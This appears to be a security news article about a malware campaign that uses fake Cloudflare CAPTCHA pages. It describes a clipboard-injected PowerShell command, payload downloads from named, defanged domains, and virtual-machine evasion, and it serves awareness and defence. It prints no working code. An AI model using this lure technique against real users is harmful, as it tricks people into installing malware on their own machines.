A new and highly deceptive malware campaign is using fake Cloudflare verification pages to lure unsuspecting users into installing malicious software. This social engineering tactic marks a concerning evolution in how cybercriminals exploit users’ trust in widely recognized security services.
The attack begins with a webpage that looks like a legitimate Cloudflare CAPTCHA check. Victims believe they are completing a routine security verification, but in reality, they are triggering a malware installation process. By mimicking a trusted brand like Cloudflare, attackers take advantage of the public’s familiarity with such interfaces, lowering skepticism and increasing the likelihood of compliance.
According to analysts including those at Shaquib Izhar, this campaign is particularly dangerous due to its layered approach. After clicking the “Verify” button on the fake CAPTCHA screen, malicious PowerShell code is silently copied to the user’s clipboard. At the same time, the system logs the victim’s IP address, which is used for initial reconnaissance. The attackers further trick users by prompting another round of verification, reinforcing the illusion of legitimacy while monitoring behavior through embedded keystroke tracking.
From a technical perspective, the campaign features a sophisticated infection chain that avoids traditional security tools. Once users open the Windows Run prompt and execute the copied command, their machine connects to the attacker’s control infrastructure using embedded webhooks. This allows real-time updates to be sent to the threat actors about the victim’s actions.
The copied PowerShell command retrieves an encoded payload from pastesio[.]com, which downloads a hardcoded batch file from axiomsniper[.]info. This BAT file is not only packed with evasion techniques but also includes checks to detect virtual machines. If one is detected, the malware halts execution to avoid being analyzed in sandbox environments.
What makes this attack even more alarming is that the BAT file currently goes undetected by all scanners on VirusTotal. This zero-detection status illustrates the growing threat of fileless and behaviorally stealthy malware that bypasses signature-based antivirus solutions.
In summary, this campaign demonstrates how attackers are refining their social engineering skills and technical delivery methods. It highlights the urgent need for security teams to adopt behavioral detection strategies and improve user awareness training with a focus on recognizing even familiar-looking threats.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
